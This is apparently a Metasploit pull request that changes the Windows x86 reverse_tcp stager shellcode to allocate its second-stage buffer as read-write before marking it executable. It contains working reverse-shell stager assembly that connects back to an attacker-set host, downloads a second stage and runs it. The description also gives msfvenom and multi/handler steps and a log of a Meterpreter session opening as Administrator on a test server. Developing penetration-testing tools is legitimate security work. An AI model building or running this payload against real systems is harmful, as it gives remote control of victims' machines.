### PR TITLE
Use minimal permissions in buffer allocations

### DIFF
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -7,66 +7,68 @@ require 'msf/core/payload/windows/block_api'
 require 'msf/core/payload/windows/exitfunk'
 
 module Msf
+
 ###
 #
 # Complex reverse_tcp payload generation for Windows ARCH_X86
 #
 ###
 
-module Payload::Windows::ReverseTcp
-  include Msf::Payload::TransportConfig
-  include Msf::Payload::Windows
-  include Msf::Payload::Windows::SendUUID
-  include Msf::Payload::Windows::BlockApi
-  include Msf::Payload::Windows::Exitfunk
+  module Payload::Windows::ReverseTcp
 
-  #
-  # Register reverse tcp specific options
-  #
-  def initialize(*args)
-    super
-    register_advanced_options([ OptString.new('PayloadBindPort', [false, 'Port to bind reverse tcp socket to on target system.']) ], self.class)
-  end
+    include Msf::Payload::TransportConfig
+    include Msf::Payload::Windows
+    include Msf::Payload::Windows::SendUUID
+    include Msf::Payload::Windows::BlockApi
+    include Msf::Payload::Windows::Exitfunk
 
-  #
-  # Generate the first stage
-  #
-  def generate(opts = {})
-    ds = opts[:datastore] || datastore
-    conf = {
-      port:        ds['LPORT'],
-      host:        ds['LHOST'],
-      retry_count: ds['ReverseConnectRetries'],
-      bind_port:   ds['PayloadBindPort'],
-      reliable:    false
-    }
-
-    # Generate the advanced stager if we have space
-    if available_space && required_space <= available_space
-      conf[:exitfunk] = ds['EXITFUNC']
-      conf[:reliable] = true
+    #
+    # Register reverse tcp specific options
+    #
+    def initialize(*args)
+      super
+      register_advanced_options([ OptString.new('PayloadBindPort', [false, 'Port to bind reverse tcp socket to on target system.']) ], self.class)
     end
 
-    generate_reverse_tcp(conf)
-  end
+    #
+    # Generate the first stage
+    #
+    def generate(opts={})
+      ds = opts[:datastore] || datastore
+      conf = {
+          port:        ds['LPORT'],
+          host:        ds['LHOST'],
+          retry_count: ds['ReverseConnectRetries'],
+          bind_port:   ds['PayloadBindPort'],
+          reliable:    false
+      }
 
-  #
-  # By default, we don't want to send the UUID, but we'll send
-  # for certain payloads if requested.
-  #
-  def include_send_uuid
-    false
-  end
+      # Generate the advanced stager if we have space
+      if self.available_space && required_space <= self.available_space
+        conf[:exitfunk] = ds['EXITFUNC']
+        conf[:reliable] = true
+      end
 
-  def transport_config(opts = {})
-    transport_config_reverse_tcp(opts)
-  end
+      generate_reverse_tcp(conf)
+    end
 
-  #
-  # Generate and compile the stager
-  #
-  def generate_reverse_tcp(opts = {})
-    combined_asm = %(
+    #
+    # By default, we don't want to send the UUID, but we'll send
+    # for certain payloads if requested.
+    #
+    def include_send_uuid
+      false
+    end
+
+    def transport_config(opts={})
+      transport_config_reverse_tcp(opts)
+    end
+
+    #
+    # Generate and compile the stager
+    #
+    def generate_reverse_tcp(opts={})
+      combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
       #{asm_block_api}
@@ -74,46 +76,46 @@ module Payload::Windows::ReverseTcp
         pop ebp
       #{asm_reverse_tcp(opts)}
       #{asm_block_recv(opts)}
-    )
-    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
-  end
+      ^
+      Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
+    end
 
-  #
-  # Determine the maximum amount of space required for the features requested
-  #
-  def required_space
-    # Start with our cached default generated size
-    space = cached_size
+    #
+    # Determine the maximum amount of space required for the features requested
+    #
+    def required_space
+      # Start with our cached default generated size
+      space = cached_size
 
-    # EXITFUNK 'thread' is the biggest by far, adds 29 bytes.
-    space += 29
+      # EXITFUNK 'thread' is the biggest by far, adds 29 bytes.
+      space += 29
 
-    # Reliability adds some bytes!
-    space += 44
+      # Reliability adds some bytes!
+      space += 44
 
-    space += uuid_required_size if include_send_uuid
+      space += uuid_required_size if include_send_uuid
 
-    # The final estimated size
-    space
-  end
+      # The final estimated size
+      space
+    end
 
-  #
-  # Generate an assembly stub with the configured feature set and options.
-  #
-  # @option opts [Integer] :port The port to connect to
-  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
-  # @option opts [Integer] :retry_count Number of retry attempts
-  #
-  def asm_reverse_tcp(opts = {})
+    #
+    # Generate an assembly stub with the configured feature set and options.
+    #
+    # @option opts [Integer] :port The port to connect to
+    # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
+    # @option opts [Integer] :retry_count Number of retry attempts
+    #
+    def asm_reverse_tcp(opts={})
 
-    retry_count  = [opts[:retry_count].to_i, 1].max
-    encoded_port = format("0x%.8x", [opts[:port].to_i, 2].pack("vn").unpack1("N"))
-    encoded_host = format("0x%.8x", Rex::Socket.addr_aton(opts[:host] || "127.127.127.127").unpack1("V"))
+      retry_count  = [opts[:retry_count].to_i, 1].max
+      encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+      encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
 
-    # addr_fam      = 2
-    sockaddr_size = 16
+      addr_fam      = 2
+      sockaddr_size = 16
 
-    asm = %(
+      asm = %Q^
       ; Input: EBP must be the address of 'api_call'.
       ; Output: EDI will be the socket for the connection to the server
       ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
@@ -152,12 +154,12 @@ module Payload::Windows::ReverseTcp
         push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
-    )
-    # Check if a bind port was specified
-    if opts[:bind_port]
-      bind_port = opts[:bind_port]
-      encoded_bind_port = format("0x%.8x", [bind_port.to_i, 2].pack("vn").unpack1("N").first)
-      asm << %(
+    ^
+      # Check if a bind port was specified
+      if opts[:bind_port]
+        bind_port    = opts[:bind_port]
+        encoded_bind_port = "0x%.8x" % [bind_port.to_i,2].pack("vn").unpack("N").first
+        asm << %Q^
         xor eax, eax
         push 11
         pop ecx
@@ -165,8 +167,9 @@ module Payload::Windows::ReverseTcp
         push eax               ; if we succeed, eax will be zero, push it enough times
                                ; to cater for both IPv4 and IPv6
         loop push_0_loop
-        push #{encoded_bind_port} ; bind to 0.0.0.0/[::], pushed above
-                                  ; family AF_INET and port number
+
+                         ; bind to 0.0.0.0/[::], pushed above
+        push #{encoded_bind_port}   ; family AF_INET and port number
         mov esi, esp           ; save a pointer to sockaddr_in struct
         push #{sockaddr_size}  ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
         push esi               ; pointer to the sockaddr_in struct
@@ -176,10 +179,10 @@ module Payload::Windows::ReverseTcp
         push #{encoded_host}    ; host in little-endian format
         push #{encoded_port}    ; family AF_INET and port number
         mov esi, esp
-      )
-    end
+      ^
+      end
 
-    asm << %(
+      asm << %Q^
       try_connect:
         push 16                 ; length of the sockaddr struct
         push esi                ; pointer to the sockaddr struct
@@ -194,40 +197,40 @@ module Payload::Windows::ReverseTcp
         ; decrement our attempt count and try again
         dec dword [esi+8]
         jnz try_connect
-    )
+    ^
 
-    if opts[:exitfunk]
-      asm << %(
+      if opts[:exitfunk]
+        asm << %Q^
       failure:
         call exitfunk
-      )
-    else
-      asm << %(
+      ^
+      else
+        asm << %Q^
       failure:
         push 0x56A2B5F0         ; hardcoded to exitprocess for size
         call ebp
-      )
-    end
+      ^
+      end
 
-    asm << %(
-      ; this label is required so that reconnect attempts include
+      asm << %Q^
+      ; this  lable is required so that reconnect attempts include
       ; the UUID stuff if required.
       connected:
-    )
+    ^
 
-    asm << asm_send_uuid if include_send_uuid
+      asm << asm_send_uuid if include_send_uuid
 
-    asm
-  end
+      asm
+    end
 
-  #
-  # Generate an assembly stub with the configured feature set and options.
-  #
-  # @option opts [Bool] :reliable Whether or not to enable error handling code
-  #
-  def asm_block_recv(opts = {})
-    reliable = opts[:reliable]
-    asm = %(
+    #
+    # Generate an assembly stub with the configured feature set and options.
+    #
+    # @option opts [Bool] :reliable Whether or not to enable error handling code
+    #
+    def asm_block_recv(opts={})
+      reliable     = opts[:reliable]
+      asm = %Q^
       recv:
         ; Receive the size of the incoming second stage...
         push 0                  ; flags
@@ -236,41 +239,41 @@ module Payload::Windows::ReverseTcp
         push edi                ; the saved socket
         push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
         call ebp                ; recv( s, &dwLength, 4, 0 );
-    )
+    ^
 
-    if reliable
-      asm << %(
+      if reliable
+        asm << %Q^
         ; reliability: check to see if the recv worked, and reconnect
         ; if it fails
         cmp eax, 0
         jle cleanup_socket
-      )
-    end
+      ^
+      end
 
-    asm << %(
-        ; Alloc a RW buffer for the second stage
+      asm << %Q^
+        ; Alloc a RWX buffer for the second stage
         mov esi, [esi]          ; dereference the pointer to the second stage length
-        push 0x04               ; PAGE_READWRITE
+        push 0x04               ; PAGE_EXECUTE_READWRITE
         push 0x1000             ; MEM_COMMIT
         push esi                ; push the newly recieved second stage length.
         push 0                  ; NULL as we dont care where the allocation is.
         push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
-        call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
+        call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax           ; ebx = our new memory address for the new stage
-        push ebx
+        push ebx                ; push the address of the new stage so we can return into it
 
       read_more:
         push 0                  ; flags
         push esi                ; length
-        push ebx                ; the current address into our second stage's RW buffer
+        push ebx                ; the current address into our second stage's RWX buffer
         push edi                ; the saved socket
         push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
         call ebp                ; recv( s, buffer, length, 0 );
-    )
+    ^
 
-    if reliable
-      asm << %(
+      if reliable
+        asm << %Q^
         ; reliability: check to see if the recv worked, and reconnect
         ; if it fails
         cmp eax, 0
@@ -298,31 +301,41 @@ module Payload::Windows::ReverseTcp
         ; try again
         jnz create_socket
         jmp failure
-      )
-    end
+      ^
+      end
 
-    asm << %(
+      asm << %Q^
       read_successful:
         add ebx, eax            ; buffer += bytes_received
         sub esi, eax            ; length -= bytes_received, will set flags
         jnz read_more           ; continue if we have more to read
         ;
-        pop ebx                 ; lpAddress
-        push esp                ; push random address for lpflOldProtect onto stack
-        push 0x10               ; push flNewProtect onto stack
-        push eax                ; push some random size (!?) onto stack (this needs more looking into)
-        push ebx                ; push lpAddress onto stack
+        int 3
+        pushad                  ; preserve all registers
+        mov ebx, [esp+0x20]     ; preserve lpAddress (memory address for second stage)
+        mov esi, [esp+0x24]     ; preserve dwSize
+        push 0x4                ; previous protection constant (PAGE_READWRITE)
+        push esp                ; lpflOldProtect (address of previous protection constant)
+        push 0x40               ; flNewProtect ("PAGE_EXECUTE_READWRITE") (0x10 "PAGE_EXECUTE" was causing problems)
+        push esi                ; dwSize (size of second stage)
+        push ebx                ; lpAddress (memory address for second stage)
         push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualProtect')}
-        call ebp                ; VirtualProtect( lpAddress, dwSize, flNewProtect, lpFlOldProtect)
-        push ebx                ; to be able return into second stage
+        call ebp                ; VirtualProtect( lpAddress, dwSize, PAGE_EXECUTE, lpflOldProtect )
+        pop eax                 ; remove artifact from stack (return value of VirtualProtect is also on the stack)
+        popad                   ; restore all registers back to initial state
+        int 3
         ;
         ret                     ; return into the second stage
-    )
 
-    if opts[:exitfunk]
-      asm << asm_exitfunk(opts)
+      ^
+
+      if opts[:exitfunk]
+        asm << asm_exitfunk(opts)
+      end
+
+      asm
     end
-    asm
+
   end
-end
+
 end

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -251,9 +251,9 @@ module Msf
       end
 
       asm << %Q^
-        ; Alloc a RWX buffer for the second stage
+        ; Alloc a RW buffer for the second stage
         mov esi, [esi]          ; dereference the pointer to the second stage length
-        push 0x04               ; PAGE_EXECUTE_READWRITE
+        push 0x04               ; PAGE_READWRITE
         push 0x1000             ; MEM_COMMIT
         push esi                ; push the newly recieved second stage length.
         push 0                  ; NULL as we dont care where the allocation is.
@@ -310,7 +310,6 @@ module Msf
         sub esi, eax            ; length -= bytes_received, will set flags
         jnz read_more           ; continue if we have more to read
         ;
-        int 3
         pushad                  ; preserve all registers
         mov ebx, [esp+0x20]     ; preserve lpAddress (memory address for second stage)
         mov esi, [esp+0x24]     ; preserve dwSize
@@ -323,7 +322,6 @@ module Msf
         call ebp                ; VirtualProtect( lpAddress, dwSize, PAGE_EXECUTE, lpflOldProtect )
         pop eax                 ; remove artifact from stack (return value of VirtualProtect is also on the stack)
         popad                   ; restore all registers back to initial state
-        int 3
         ;
         ret                     ; return into the second stage
 

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -258,7 +258,7 @@ module Msf
         push esi                ; push the newly recieved second stage length.
         push 0                  ; NULL as we dont care where the allocation is.
         push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
-        call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+        call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax           ; ebx = our new memory address for the new stage
         push ebx                ; push the address of the new stage so we can return into it
@@ -313,13 +313,13 @@ module Msf
         pushad                  ; preserve all registers
         mov ebx, [esp+0x20]     ; preserve lpAddress (memory address for second stage)
         mov esi, [esp+0x24]     ; preserve dwSize
-        push 0x4                ; previous protection constant (PAGE_READWRITE)
+        push 0x04                ; previous protection constant (PAGE_READWRITE)
         push esp                ; lpflOldProtect (address of previous protection constant)
         push 0x40               ; flNewProtect ("PAGE_EXECUTE_READWRITE") (0x10 "PAGE_EXECUTE" was causing problems)
         push esi                ; dwSize (size of second stage)
         push ebx                ; lpAddress (memory address for second stage)
         push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualProtect')}
-        call ebp                ; VirtualProtect( lpAddress, dwSize, PAGE_EXECUTE, lpflOldProtect )
+        call ebp                ; VirtualProtect( lpAddress, dwSize, PAGE_EXECUTE_READWRITE, lpflOldProtect )
         pop eax                 ; remove artifact from stack (return value of VirtualProtect is also on the stack)
         popad                   ; restore all registers back to initial state
         ;

--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 283
+  CachedSize = 297
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp

--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 310
+  CachedSize = 308
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp

--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 297
+  CachedSize = 310
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp

--- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp_dns'
 
 module MetasploitModule
 
-  CachedSize = 308
+  CachedSize = 322
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcpDns

--- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp_dns'
 
 module MetasploitModule
 
-  CachedSize = 322
+  CachedSize = 335
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcpDns

--- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp_dns'
 
 module MetasploitModule
 
-  CachedSize = 335
+  CachedSize = 333
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcpDns

--- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 316
+  CachedSize = 330
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp

--- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 330
+  CachedSize = 343
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp

--- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 343
+  CachedSize = 341
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp

--- a/modules/payloads/stagers/windows/reverse_udp.rb
+++ b/modules/payloads/stagers/windows/reverse_udp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_udp'
 
 module MetasploitModule
 
-  CachedSize = 299
+  CachedSize = 313
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseUdp

--- a/modules/payloads/stagers/windows/reverse_udp.rb
+++ b/modules/payloads/stagers/windows/reverse_udp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_udp'
 
 module MetasploitModule
 
-  CachedSize = 326
+  CachedSize = 324
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseUdp

--- a/modules/payloads/stagers/windows/reverse_udp.rb
+++ b/modules/payloads/stagers/windows/reverse_udp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_udp'
 
 module MetasploitModule
 
-  CachedSize = 313
+  CachedSize = 326
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseUdp


### PR DESCRIPTION
This tentatively tries to start fixing issue #8407 for Windows stager shellcode, as @busterb recommends, by allocating memory with RW permissions, then writing shellcode to that location, then ~changing permissions to X~ changing permissions to RWX using VirtualProtect, then executing.

## Verification

~~Only tested with x86 `meterpreter` so far, but it should work with any x86 `reverse_tcp` payload in theory~~.

Tested with the following x86 payloads:
- [x] windows/meterpreter/reverse_tcp
- [x] windows/meterpreter/reverse_tcp_dns
- [x] windows/meterpreter/reverse_tcp_rc4
- [x] windows/meterpreter/reverse_tcp_rc4_dns
- [x] windows/shell/reverse_tcp
- [x] windows/shell/reverse_tcp_dns
- [x] windows/shell/reverse_tcp_rc4 (**fail**)
- [x] windows/shell/reverse_tcp_rc4_dns (**fail**)


Test system is Windows Server 2019 Datacenter x64, latest patches applied. 
First few lines of `systeminfo` from CMD:
```
Host Name:                 2K19DTCTR
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
```

Verification steps:

- [x] Generate x86 EXE payload with `msfvenom`
- [x] Start `msfconsole`
- [x] `use multi/handler`
- [x] Set the right payload
- [x] Set LHOST and LPORT
- [x] Execute payload EXE on test machine
- [x] Get a shell

Test with x86 `meterpreter`:
```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 172.16.79.1
LHOST => 172.16.79.1
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.16.79.1:4444 
[*] Sending stage (179779 bytes) to 172.16.79.128
[*] Meterpreter session 1 opened (172.16.79.1:4444 -> 172.16.79.128:50118) at 2019-07-28 21:36:39 +0800

meterpreter > getuid
Server username: 2K19DTCTR\Administrator
meterpreter > sysinfo
Computer        : 2K19DTCTR
OS              : Windows 2016 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```

## Remarks

The modification is to `lib/msf/core/payload/windows/reverse_tcp`, at the very end after the conditional jump to `read_more`. 
~Some witchcraft occurs if I use the exact size of the stager for `dwSize` to execute VirtualProtect, causing the `meterpreter` shell to die immediately. `EAX` at that point contains some value that is most likely < stager size, so `EAX` was used instead, and a `meterpreter` shell pops every time. I am quite certain that this should not be done, but I haven't a clue how. **EDIT**: This is also probably why `windows/shell/reverse_tcp` fails.~

~(It is very highly possible that I have been barking up the wrong tree, and the modification should not be made to this file at all.)~

~Non-functional changes: tidied up the file according to Rubocop.~